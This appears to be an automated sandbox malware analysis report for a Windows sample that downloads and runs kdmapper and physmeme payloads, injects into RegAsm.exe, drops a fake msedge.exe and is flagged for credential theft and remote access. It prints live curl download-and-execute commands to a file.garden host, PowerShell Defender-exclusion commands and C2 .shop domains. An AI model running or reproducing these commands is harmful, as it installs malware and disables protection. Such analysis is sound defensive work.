                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeCode function: 10_2_02892129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,10_2_02892129
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strappystyio.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coursedonnyre.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fossillargeiw.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencerangej.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appleboltelwk.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tearrybyiwo.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: captainynfanw.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surveriysiop.shop
                                Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tiddymarktwo.shop
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E96008Jump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417ECC0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,0_2_00007FF67417ECC0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063F654 cpuid 6_2_0063F654
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF67418D900
                                Source: C:\Windows\Speech\kdmapper.exeCode function: GetLocaleInfoW,GetNumberFormatW,6_2_0063AF0F
                                Source: C:\Windows\Speech\physmeme.exeQueries volume information: C:\Windows\Speech\physmeme.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeQueries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418D77C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF67418D77C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062B146 GetVersionExW,6_2_0062B146
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: gh3zRWl4or.exe, gh3zRWl4or.exe, 00000000.00000000.1286192249.00007FF674190000.00000002.00000001.01000000.00000003.sdmp, gh3zRWl4or.exe, 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ollydbg.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 6632, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 1504, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 6632, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 1504, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts11
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                11
                                Disable or Modify Tools
                                11
                                Input Capture
                                1
                                System Time Discovery
                                1
                                Taint Shared Content
                                11
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Native API
                                1
                                DLL Side-Loading
                                411
                                Process Injection
                                111
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                1
                                Scheduled Task/Job
                                1
                                Scheduled Task/Job
                                4
                                Obfuscated Files or Information
                                Security Account Manager37
                                System Information Discovery
                                SMB/Windows Admin Shares11
                                Input Capture
                                2
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts3
                                Command and Scripting Interpreter
                                21
                                Registry Run Keys / Startup Folder
                                21
                                Registry Run Keys / Startup Folder
                                3
                                Software Packing
                                NTDS551
                                Security Software Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                113
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job
                                Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading
                                LSA Secrets241
                                Virtualization/Sandbox Evasion
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media1
